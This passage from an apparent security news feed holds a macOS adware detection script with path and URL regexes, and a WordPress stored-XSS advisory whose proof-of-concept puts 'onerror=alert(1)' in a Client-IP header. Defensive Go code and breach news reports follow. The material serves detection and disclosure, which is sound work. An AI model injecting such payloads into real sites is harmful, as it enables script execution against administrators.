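Added example, not code from the original post. The regexes are the post's
own, corrected so they match the post's own examples (see the lead-in).
SAMPLE_ARTIFACTS is constructed from those examples plus benign controls;
a real run would feed it `find` output or file-event telemetry."""
import re

USER = r"(?:~|/Users/[^/]+)"  # "~" as written in the post, or a real home directory
HEX = "[0-9A-Fa-f]"            # the post's [0-9a-f] misses its own uppercase examples
UUID = f"{HEX}{{8}}-{HEX}{{4}}-{HEX}{{4}}-{HEX}{{4}}-{HEX}{{12}}"
APPSUP = "/Library/Application Support"

RULES = {
    "Adload System_Service": [
        rf"^{USER}{APPSUP}/\.[0-9]{{19,}}/Services/com\..*service/.*\.service$",
        rf"^{APPSUP}/\.[0-9]{{19,}}/System/com\..*system/.*\.system$",
    ],
    "Adload Go (Rload/Lador)": [
        rf"^{USER}?{APPSUP}/com\.\d{{19,21}}\.{UUID}/_?\d{{19,21}}$",
    ],
    "Adload Kotlin": [
        rf"^{USER}?{APPSUP}/\.{UUID}/\.{UUID}$",
        r"^http://m\.[^/]+\.com/ktl/uba\?ral=",
    ],
    "Adload or MaxOfferDeal/Genieo (/tmp/php*: Mach-O vs plist)": [
        r"^/tmp/php\w{6}$",
    ],
    "Adload (older Lookup/SearchDaemon)": [
        rf"^{APPSUP}/com\..*Lookup.*Lookup.*$",
        rf"^{APPSUP}/com\..*SearchDaemon.*Search.*$",
    ],
    "Shlayer/ZShlayer installer": [
        r"^/Volumes/Player/Player\.app/Contents/MacOS/\w+$",
        r"^/Volumes/[Ii]nstall/[Ii]nstall\.app/Contents/MacOS/\w+$",
        r"^/Volumes/Player/Player\.command$",
        r"^/Volumes/install/\.hidden/install\.command$",
    ],
    "Shlayer/ZShlayer stage 1": [
        r"^/tmp/[^/]{9}/Player\.app/Contents/MacOS/\w+$",
        r"^/tmp/[^/]{9}/[Ii]nstall\.app/Contents/MacOS/\w+$",
    ],
    "Pirrit": [
        r"^/Volumes/Install Flash Player/Install Flash Player$",
        r"^/private/var/.*/tmp\.[^/]{8}$",
        rf"^{USER}/Library/([^/]+)/\1\.app/Contents/MacOS/.*$",
    ],
    "Pirrit stage 2 (also matches older Adload com.<Name>/<Name>)": [
        rf"^{USER}{APPSUP}/com\.[A-Za-z]+/[A-Za-z]+$",
    ],
    "MaxOfferDeal/Genieo": [rf"^{USER}{APPSUP}/\.gettime/GetTime$"],
    "MMInstall/MacUpdater": [
        r"^/Volumes/search/Search\.app/Contents/MacOS/Search$",
        r"^https?://[^/]*\b(yougotupdated|liveforlifetoday)\.com\b",
    ],
}
COMPILED = {fam: [re.compile(p) for p in pats] for fam, pats in RULES.items()}


def hunt(artifact):
    """Families whose patterns match one path or URL (sorted; [] when clean)."""
    return sorted(f for f, pats in COMPILED.items() if any(p.search(artifact) for p in pats))


def hunt_all(artifacts):
    """Only the artifacts that matched, each with its families."""
    return {a: fams for a in artifacts if (fams := hunt(a))}


# Constructed from the examples in this post, plus two benign controls at the end.
SAMPLE_ARTIFACTS = [
    "~/Library/Application Support/.16951906660859967924/Services/com.SkilledUnit.service/SkilledUnit.service",
    "/Library/Application Support/com.2718493167946217159.4E41C598-9C07-4446-96A4-CE22A41B6BF1/_5214250257291383846",
    "/tmp/zWMp9EpUT/Install.app/Contents/MacOS/isolated",
    "/private/var/folders/7d/7skpstwd7qnctfwpwp7225xw0000gn/T/tmp.kfiBqqFO",
    "~/Library/Application Support/com.AdvancedRecord/AdvancedRecord",
    "http://m.originalrotator.com/ktl/uba?ral=",
    "/Applications/Safari.app/Contents/MacOS/Safari",
    "/Users/user/Documents/report.pdf",
]

if __name__ == "__main__":
    for artifact, families in hunt_all(SAMPLE_ARTIFACTS).items():
        print(f"{', '.join(families)}\n    {artifact}")
```

Every pattern is anchored at both ends, so a family only fires on the full path shape rather than on a substring such as Application Support appearing anywhere in a longer path.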

Conclusion

Most adware arrives in the form of trojanized applications that users are persuaded to attempt to install. Free content, cracked apps, and “special deals” are typical vectors. The fact that some – although by no means all – adware installers make a show of obtaining user consent doesn’t ameliorate the situation: in the cases where that does happen, the consent mechanism is itself often misleading or aggressive.

Regardless of how it is installed, unless the user has permission from the device owner, then adware will almost certainly be unwanted on company-owned devices. Given the aggressive behaviour of adware, it should be of no less concern than any other type of malware.

We hope the information in this post will help security teams identify and remove adware infections on Mac devices. We would also encourage analysts to become familiar with other useful behavioural indicators associated with a wide range of macOS threats, including adware families.


WordPress CRM Form Entries Cross-Site Scripting


WordPress CRM Form Entries versions prior to 1.1.7 appear susceptible to a cross site scripting vulnerability.

# Description:
The CRM Form Entries plugin for WordPress (contact-form-entries) before version 1.1.7 stores the unvalidated Client-IP request header with each form submission and renders it in the administrator's entries view, allowing stored cross-site scripting by anyone who can submit the form.




# Technical Details and Exploitation:
CRM Form Entries is vulnerable to stored XSS via the Client IP field.
When a visitor submits a form, the plugin records the client's IP address
alongside the entry:
===============================================================================================================
public function get_ip(),
wp-content/plugins/contact-form-entries/contact-form-entries.php, line 1388
==============================================================================================================
The user can set an arbitrary "HTTP_CLIENT_IP" value, and the value is
stored inside the database.


# Proof Of Concept:

Suppose that you have a Contact Form, intercept the POST request and insert
the following Client-IP header
===============================================================================================================
POST /index.php?rest_route=/contact-form-7/v1/contact-forms/10/feedback HTTP/1.1
Host: dsp.com:11080
Content-Length: 1411
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ...
Client-IP: <img src=a onerror=alert(1)>

------WebKitFormBoundaryCuNGXLnhRsdglEAx

Content-Disposition: form-data; name="_wpcf7"

10
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_version"

5.3.1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_locale"

en_US
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_unit_tag"

wpcf7-f10-p13-o1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_container_post"

...
===============================================================================================================
The request is acccepted, and the code navigates the section
$_SERVER['HTTP_CLIENT_IP'] , ip is injected and saved inside the database.
When the administrator clicks on the entry element in the plugin, the XSS
is triggered.


# Solution:
Upgrade Contact Form Entries to version 1.1.7
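The root cause above is a request header (HTTP_CLIENT_IP) being stored verbatim and later rendered unescaped in the admin page. As an added example, not the plugin's PHP code, here is the corresponding defensive pattern written in Go: only consult a client-IP header when the request arrived from a trusted reverse proxy, only keep the value when it parses as an IP address, and HTML-escape the stored field at output time regardless. The trusted-proxy address, the header names consulted and the renderEntryRow helper are assumptions made for this example.

```go
package main

import (
	"fmt"
	"html"
	"net"
	"net/http"
	"strings"
)

// trustedProxies lists the reverse proxies whose forwarding headers we accept.
// Constructed for this example; in a real deployment it comes from configuration.
var trustedProxies = map[string]bool{"10.0.0.5": true}

// clientIP returns the client address to store with a form entry. It consults
// Client-IP / X-Forwarded-For only when the TCP peer is a trusted proxy, and
// only accepts a value that parses as an IP address, so markup such as
// <img src=a onerror=alert(1)> is never written to the database.
func clientIP(r *http.Request) string {
	peer, _, err := net.SplitHostPort(r.RemoteAddr)
	if err != nil {
		peer = r.RemoteAddr
	}
	if trustedProxies[peer] {
		for _, h := range []string{"Client-IP", "X-Forwarded-For"} {
			// X-Forwarded-For may be a comma-separated chain; the first hop is the client.
			first := strings.TrimSpace(strings.Split(r.Header.Get(h), ",")[0])
			if ip := net.ParseIP(first); ip != nil {
				return ip.String()
			}
		}
	}
	// Untrusted peer or no usable header: fall back to the socket address.
	return peer
}

// renderEntryRow escapes the stored field at output time as defence in depth:
// even if the database already holds hostile data, it cannot execute in the
// admin page. (Hypothetical helper standing in for the plugin's entry view.)
func renderEntryRow(ip string) string {
	return fmt.Sprintf("<td class=\"client-ip\">%s</td>", html.EscapeString(ip))
}

func main() {
	// Constructed request carrying the same header as the advisory's PoC.
	req, _ := http.NewRequest("POST", "/form", nil)
	req.RemoteAddr = "203.0.113.7:51234"
	req.Header.Set("Client-IP", "<img src=a onerror=alert(1)>")
	fmt.Println(clientIP(req))                  // 203.0.113.7: header ignored, peer is not a trusted proxy
	fmt.Println(renderEntryRow(clientIP(req)))  // <td class="client-ip">203.0.113.7</td>
}
```

Validating on input and escaping on output are independent controls: the first keeps junk out of the database, the second protects the admin page even against rows that were stored before the fix.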


Broward Health warns 1.3 million patients, staff of Data Breach


The hospital system says they waited months to notify victims of the breach because the Justice Department asked them to.

This weekend, the Broward Health hospital system notified more than 1.3 million patients and staff members that their personal information was involved in a data breach that started on October 15. 

In a statement on Saturday, the Florida hospital system said that in addition to names, addresses and phone numbers, Social Security numbers, bank account information and medical history data was included in the breach.  

Insurance account information, driver’s license numbers, email addresses and treatments received were also included. The hospital system said it waited months to notify victims because the Department of Justice told them to hold off on sending out breach notification letters. 

“On October 15, 2021, an intruder gained entry to the Broward Health network through the office of a third-party medical provider permitted to access the system to provide healthcare services. Broward Health discovered the intrusion on October 19, 2021, and promptly contained the incident, notified the FBI and the Department of Justice (DOJ), required a password reset for all employees and engaged an independent cybersecurity firm to conduct an investigation,” the hospital explained.

“Broward Health also engaged an experienced data review specialist to conduct an extensive analysis of the data to determine what was impacted, which determined some patient and employee personal information may have been impacted. The DOJ requested the Broward Health briefly delay this notification to ensure that the notification does not compromise the ongoing law enforcement investigation.”

The hospital system did not say how many people were involved, but in their submission to the Maine Attorney General’s office, they said 1,357,879 people were affected. 

Image: Maine Attorney General filing, Data Breach, 1,357,879 affected

The hospital is offering 24 months of identity theft protection services, implemented multifactor authentication for all users of its systems and “minimum-security requirements for devices not managed by Broward Health Information Technology with access to its network.”

The notice warned that people who had their information exposed are now vulnerable to medical identity theft, which is when someone uses a person’s name and information to get medical services or fraudulently bill for medical services. The hospital urged those affected to monitor their benefits statements and financial accounts. 

Joseph Carson, the chief security scientist at ThycoticCentrify, said countries where healthcare is extremely expensive are the leading targets for cybercriminals looking to steal and monetize personal health information.

In many instances, personal health information is much more valuable than stolen credit card information, Carson added, noting that it can be sold for up to $500 or more on the dark web because it can easily be abused for fake medical claims, fake prescriptions or fake identities.  

“Personal health information can also be used for extortion or blackmail targeting victims who do not want sensitive information disclosed or even to abuse insurance claims and tax refunds,” Carson said. 

“Unfortunately, for medical records, you cannot change your medical history. Once stolen or disclosed, it is public knowledge, whereas a credit card you can change and get back on track quickly.”


Chinese Hackers Exploit Academic Institution using Log4J Vulnerability


Chinese Hackers Target Academic Institution

A previously unseen China-based targeted intrusion adversary, dubbed “Aquatic Panda”, has been found leveraging security flaws in the Apache Log4j logging library.

The Log4j vulnerability was used as an access vector to carry out post-exploitation operations and credential harvesting. Cybersecurity firm CrowdStrike said the intrusion, which was ultimately foiled, was aimed at an unnamed “large academic institution.”

The state-sponsored group is believed to have been operating since mid-2020 in pursuit of intelligence collection and industrial espionage, with its attacks frequently directed at organizations in the telecommunications, technology, and government sectors.

The attempted intrusion exploited the newly discovered Log4Shell flaw (CVE-2021-44228, CVSS score: 10.0) to gain access to a vulnerable instance of the VMware Horizon desktop and app virtualization product, followed by running a series of malicious commands orchestrated to fetch threat actor payloads hosted on a remote server.


“A modified version of the Log4j exploit was likely used during the course of the threat actor’s operations,” the researchers noted, adding it involved the use of an exploit that was published in GitHub on December 13, 2021.

Aquatic Panda’s malicious behaviour went beyond conducting reconnaissance of the compromised host, starting with making an effort to stop a third-party endpoint detection and response (EDR) service, before proceeding to retrieve next-stage payloads designed to obtain a reverse shell and harvest credentials.

After the organization was alerted to the incident, it was able to quickly implement its incident response protocol, which involved patching the vulnerable application and preventing further threat actor activity on the host.

Because the attack was disrupted, its exact intent remains unknown.

source

What is Endpoint Security?

Endpoint security is the practice of securing endpoints or entry points of end-user devices such as desktops, laptops, and mobile devices from being exploited by malicious actors and campaigns. Endpoint security systems protect these endpoints on a network or in the cloud from cybersecurity threats. Endpoint security has evolved from traditional antivirus software to providing comprehensive protection from sophisticated malware and evolving zero-day threats.


What do security professionals actually do?


Whether you’re a new analyst looking to get into the IT security field, or a senior executive looking to understand more about security responsibilities, a common question is this: What do security professionals actually do?

A fully-loaded question

Understanding the roles of security professionals can either be overly simple or intensively complex, depending upon the depth of your investigation. In particular, while security responsibility “generalization” has been expanding to roles outside of ‘pure security’ (i.e. application development, etc.), specialization still occurs and is critical for organizations to be successful.

However, there are various areas that are important for organizations to utilize. Some of these roles could be in architecture and operations (setting up the security posture and maintaining it). Other roles could be in threat hunting or risk management.

How to make sense of it all

Rafeeq Rehman, an Information Security and Cloud Security specialist, has been publishing the CISO MindMap for a number of years. It is designed “…as an effective educational tool but also enables professionals to use this MindMap for designing and refining their security programs“. In a way, it provides a very high level, yet deep, view into the different roles and responsibilities of various security personnel. Rafeeq Rehman has graciously posted the PDF version of this image here.

Source: rafeeqrehman.com


Cybersecurity Statistics to know for 2022


As we ride the wave and approach the first working week, let’s take a look at some statistics that will help you stay up to date on recent cybersecurity trends.

Without argument, 2021 was quite the roller-coaster. Nevertheless, as we enter a more hopeful new year, we have come up with a list of impactful cybersecurity statistics that should help you stay at the top of your security and privacy game over the next 12 months.

Drumroll, please.

CyberSecurity Statistics

  • 2021 saw the highest average cost of a data breach in 17 years. The cost rose from US$3.86 million to US$4.24 million on an annual basis.
  • The COVID-19-powered shift to remote work had a direct impact on the costs of data breaches. The average cost of a data breach was US$1.07 million higher where remote work was a factor in causing the breach.
  • The most common cause of data breaches was pilfered user credentials. As a commonly used attack vector, these were responsible for 20% of breaches, which had an average cost of US$4.37 million. 
  • Midway through 2021, IT management software provider Kaseya had its systems compromised by the Sodinokibi ransomware, with the perpetrators asking for a US$70 million ransom – this was the largest ransomware fee demanded yet.
  • Social engineering attacks are the gravest threat to public administration, accounting for 69% of all public administration breaches analyzed by Verizon in 2021. 
  • Shortly after Log4Shell, the critical vulnerability in the Log4j logging utility, was disclosed in December 2021, ESET detected and blocked hundreds of thousands of exploitation attempts, with most of them located in the United States and the United Kingdom.
  • 2021 saw an incredible increase in the detection of Android banking malware. In T1 it rose by an incredible 158.7%, and T2 saw a continued growth of 49%. This should be considered a worrying trend since banking trojans have a direct impact on the financials of their targets. 
  • Four years on, WannaCryptor (also known as WannaCry) is still a global threat to be reckoned with. In T2, the infamous trojan that compromises machines vulnerable to the EternalBlue exploit topped ESET’s ransomware detection charts, accounting for 21.3% of detections. 
  • Cryptocurrency investment scams remain as popular as ever. Between October 2020 and May 2021, victims were scammed out of more than US$80 million. The actual number is expected to be higher, since many people are ashamed to admit they have been duped. 
  • Cryptocurrency has been the preferred payment method for cybercriminals for a while now, especially when it comes to ransomware. As much as US$5.2 billion worth of outgoing Bitcoin transactions may be tied to ransomware payouts involving the top 10 most common ransomware variants. 
  • Early in 2021, the infamous Emotet botnet, one of the longest-lived and most pervasive malware threats, was disrupted in a large-scale global law enforcement operation. Some 700 command-and-control servers were taken offline during the bust (Europol)
  • The Cybersecurity Workforce Estimate, which assesses the number of available cybersecurity professionals worldwide, estimated the pool of specialists in 2021 to be some 4.2 million. That is an increase of 700,000 compared to the previous year. 
  • The same study also concluded that for the second year running the cybersecurity workforce gap has decreased. In 2020 the number of additional cybersecurity specialists needed by organizations to defend their assets was 3.12 million. That number shrank to 2.72 million in 2021.
  • To make up the shortfall of cybersecurity professionals needed to effectively defend the critical assets of organizations, the global cybersecurity workforce would have to grow by around 65%
  • 82% of organizations have admitted to increasing their cybersecurity budgets over the past year, with these funds accounting for up to 15% of total IT spending.
  • Recent years have seen threat actors move from just infesting systems with ransomware to double extortion where they also threaten to exfiltrate the data and release it to the public or sell it. Threats to leak the pilfered data have seen a sharp increase, going from 8.7% in 2020 to a whopping 81% in the second quarter of 2021.
  • There has been a significant increase in the overall costs of remedying a ransomware attack. In 2020 the cost was US$761,106, in 2021 the overall cost of remediating a ransomware attack skyrocketed to US$1.85 million.
  • The number of distributed denial-of-service (DDoS) attacks has also been on the upward trend, in part due to the COVID-19 pandemic. 2020 saw more than 10 million attacks occur, 1.6 million attacks more than the previous year.
  • In 2020, the Federal Bureau of Investigation’s (FBI) Internet Crime Center (IC3) received a record-breaking 791,790 cybercrime complaints, with reported losses of some US$4.2 billion. 
  • Business Email Compromise (BEC) scams remain the costliest cybercrime, with losses surpassing US$1.86 billion in 2020, according to the FBI’s latest available data. In comparison, the second-costliest scam – confidence/romance fraud – registered losses of “only” some US$600 million. (2020 Internet Crime Report)
  • The elderly were disproportionally affected by cybercrime, as some 28% of total fraud losses were sustained by victims aged over 60. This accounts for approximately US$1 billion in losses to elderly victims. (IC3 2020 Elder Fraud Report)

source


Portuguese newspaper hacked by group that attacked Ministry of Health


The Portuguese newspaper Expresso was hacked at dawn this Sunday, 2 January 2022.

Those responsible for the invasion are the Lapsus Group, the same team that shut down the Ministry of Health’s systems last December.

The newspaper’s website displays a page similar to the one shown in the attack on the Brazilian government agency. The hackers announced that they will leak data if they do not receive a payment, and said they have control of the portal’s hosting system.

In addition to the website, hackers from the Lapsus Group hacked the newspaper Expresso’s Twitter profile.

“Lapsus$ is officially the new president of Portugal”

Expresso’s Twitter profile

Social networks in the newspaper such as Instagram and Facebook, are unaffected.

About the newspaper hack

Group that invaded newspaper Expresso also attacked Ministry of Health in December 2021

Last December, the Ministry of Health of Brazil was the subject of an attack by the same attackers. A number of their systems were rendered unavailable at the time.

Lapsus Group claims to have stolen documents from operator Claro

The Lapsus Group also claims authorship of an attack against operator Claro, in the last week of last year. The company’s services, such as customer service channels, recharge of prepaid telephones and in-store systems, were offline between the 27th and 29th of December.

Procon-SP even notified the operator about the failure. The company may be fined up to R$ 11 million. Claro says that the problem was due to “a systemic instability”, and denies that there was an invasion.

Hackers, in turn, published screenshots of the operator’s internal systems, and claim to have had access to 10,000 TB of data. The website Techblog, specializing in technology news, obtained confirmation from Claro employees that the images are legitimate, and that the company had indeed suffered the virtual invasion.

source


Using HTTP Basic Auth in 2022


I create a lot of little side projects and experiments. Sometimes I have an idea that would work best behind a login.

Building an entire login system from scratch can be a significant investment and creates a major barrier to entry. It’s prevented me from building useful tools because they would require a login.

But in 2022 I won’t let that stop me.

More than ten years ago I created a little experimental tool at work. We had a database of users but we didn’t have any type of API for our login system. If I built something that wasn’t part of the monolith, it wouldn’t integrate with the system. I decided to try HTTP Basic Auth. It worked, and that little experiment slowly expanded to dozens of other tools and became a major internal admin system. I’m not involved on the teams that use those tools anymore but my little auth module is still being used because Basic Auth has been good enough.

There are some very minor downsides, but if a project does well enough, I can always build a better login system later.

It would probably be straightforward to implement a third-party login flow, such as Google, Apple, or Facebook accounts. But I have privacy and lock-in concerns with using these third-party systems.

What does HTTP Basic Authentication look like in 2022? Here’s a screenshot of the login prompt in the latest version of Google Chrome.

Chrome Basic Auth Screenshot

Some online resources mention that HTTP Basic Authentication is deprecated, but that’s a misunderstanding. Only passing username and password as part of the URL is deprecated. It’s still perfectly valid to pass the credentials in the HTTP header and that’s what I’ll be doing. This method works in every modern browser.

As an additional aside, modern browsers still support credentials in the URL, even though the practice is deprecated. To prevent certain phishing attacks, they hide those credentials from the user in various ways, but it tends to work anyway. I wouldn’t personally use credentials in the URL though; who knows how long browsers will continue to support that.

Because Basic Authentication sends the username and password with each HTTP request, it’s insecure unless the credentials are served over an encrypted HTTPS connection. These days HTTPS is the norm for many of our projects, but it’s something you need to be aware of. You don’t want to use this over a regular HTTP connection because anyone on the same network can see the unencrypted values. Because HTTPS requests are encrypted, this isn’t a problem over HTTPS.

I’ve created a template for a simple application that implements HTTP Basic Authentication in Go.
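The post's own Go template is not reproduced here. The following is an added example, not the author's code, of the pieces such a template needs given the two points made above: the credentials travel in every request as base64 (not encrypted), so the handler refuses Basic credentials over plain HTTP instead of merely discouraging it, issues a WWW-Authenticate challenge so the browser shows the prompt in the screenshot, and compares the username and password in constant time. The credentials, realm name, certificate file paths and the X-Forwarded-Proto convention are assumptions made for this example.

```go
package main

import (
	"crypto/sha256"
	"crypto/subtle"
	"log"
	"net/http"
)

// Constructed credentials for this example. A real deployment keeps the
// username and a hashed password in configuration, never in source.
const (
	authUser     = "admin"
	authPassword = "correct horse battery staple"
)

// requireHTTPS reports whether the request arrived over TLS. It accepts a
// locally terminated connection (r.TLS) or, as an assumption for this example,
// an X-Forwarded-Proto header set by a trusted reverse proxy that strips any
// client-supplied copy of that header.
func requireHTTPS(r *http.Request) bool {
	return r.TLS != nil || r.Header.Get("X-Forwarded-Proto") == "https"
}

// checkBasicAuth parses the Authorization header and compares both fields in
// constant time. Hashing first makes the inputs fixed-length, so the comparison
// leaks neither the password nor its length through timing.
func checkBasicAuth(r *http.Request) bool {
	user, pass, ok := r.BasicAuth()
	if !ok {
		return false
	}
	wantUser := sha256.Sum256([]byte(authUser))
	wantPass := sha256.Sum256([]byte(authPassword))
	gotUser := sha256.Sum256([]byte(user))
	gotPass := sha256.Sum256([]byte(pass))
	// Both comparisons always run; neither short-circuits the other.
	userOK := subtle.ConstantTimeCompare(wantUser[:], gotUser[:]) == 1
	passOK := subtle.ConstantTimeCompare(wantPass[:], gotPass[:]) == 1
	return userOK && passOK
}

// basicAuth wraps a handler: 403 on plain HTTP (so the browser is never even
// prompted for a password it would send in the clear), 401 with a challenge
// when credentials are missing or wrong, otherwise pass through.
func basicAuth(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if !requireHTTPS(r) {
			http.Error(w, "Basic authentication requires HTTPS", http.StatusForbidden)
			return
		}
		if !checkBasicAuth(r) {
			w.Header().Set("WWW-Authenticate", `Basic realm="side-project", charset="UTF-8"`)
			http.Error(w, "Unauthorized", http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

func main() {
	mux := http.NewServeMux()
	mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		w.Write([]byte("hello, authenticated user\n"))
	})
	// Assumed paths for a locally generated certificate and key.
	log.Fatal(http.ListenAndServeTLS(":8443", "cert.pem", "key.pem", basicAuth(mux)))
}
```

Returning 403 rather than 401 on plain HTTP is deliberate: a 401 would make the browser prompt and then transmit the password unencrypted, which is exactly the situation the post warns about.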

source


UVA Health notified patients after Ciox Health data breach


Someone on Twitter asked me what the first breach of 2022 would be. The following public notice is not the first breach of 2022. It is a 2021 breach that just showed up after midnight in my news search this morning. And because it involves a third-party breach, we may see other covered entities affected, too. DataBreaches.net has reached out to Ciox Health to ask for more details.  In the meantime, here is UVA’s public notice:

On December 3, 2021, UVA Health, including the UVA Medical Center in Charlottesville and UVA Culpeper Medical Center in Culpeper, learned from Ciox Health, a vendor of health information management services for UVA Health and many other health systems and providers nationwide, that an unauthorized person accessed a Ciox Health employee’s email account and may have been able to view health information of patients of several of Ciox’s health system and provider clients, including the information of 429 UVA Health patients (.01% of total UVA Health patient records). Ciox Health has informed UVA Health that the unauthorized access occurred between June 24 and July 2, 2021, and during that time an unauthorized individual may have downloaded emails and attachments in the account. Ciox Health began investigating this incident as soon as they detected it and promptly reported it to UVA Health. They have provided the following details regarding this incident:

What Happened? Ciox Health became aware of unusual activity on the email account of one of their employees and, after securing the account, launched an investigation with the assistance of an outside cybersecurity firm. Unfortunately, Ciox Health has indicated that their investigation was unable to determine whether any emails or attachments were actually viewed or acquired. The activity occurred solely within Ciox Health’s systems and did not in any way compromise the security of UVA Health’s electronic medical record or other systems.

What Information was Involved? Ciox Health reviewed the information contained in their employee’s account and determined that the information contained in the account included patient names, dates of birth, provider names and dates of service. Patients’ Social Security numbers and financial information were not viewable.

What Are Ciox and UVA Health Doing to Address this Issue? Ciox Health assures us that they are implementing additional procedures to further strengthen email security including best-practice multi-factor email authentication as well as enforcing annual compliance training specific to security awareness and identifying and avoiding suspicious emails. Because the data breach occurred within Ciox Health’s systems, UVA Health has no reason to believe that its systems or security have been compromised. UVA Health mailed letters to those patients on December 30, 2021 who Ciox Health was able to directly identify as potentially having been impacted by this issue. This publication is intended to make patients who might have been impacted but for whom we do not have sufficient information to contact them directly aware of this issue.

What Can UVA Health’s Patients Do? Ciox Health has indicated that it believes the account access occurred for purposes of sending phishing emails to individuals unrelated to Ciox Health and has no indication that patients’ information has been misused. However, as a precaution, UVA Health recommends that all patients continue to review statements they receive from their healthcare providers and health insurance provider and to contact their provider or insurer immediately if there are charges for services they did not receive. And as always, it is important to observe email best practices by being aware and not clicking on links or attachments in emails from senders you do not recognize. If you have any questions or need additional information, Ciox Health will provide a dedicated call center for affected patients. Patients with questions or who need more information can call 855.618.3107 between 9 a.m. – 6:30 p.m. Eastern Time, Monday through Friday. UVA Health and Ciox Health apologize for this incident and regret any inconvenience or concern this causes our patients.

source
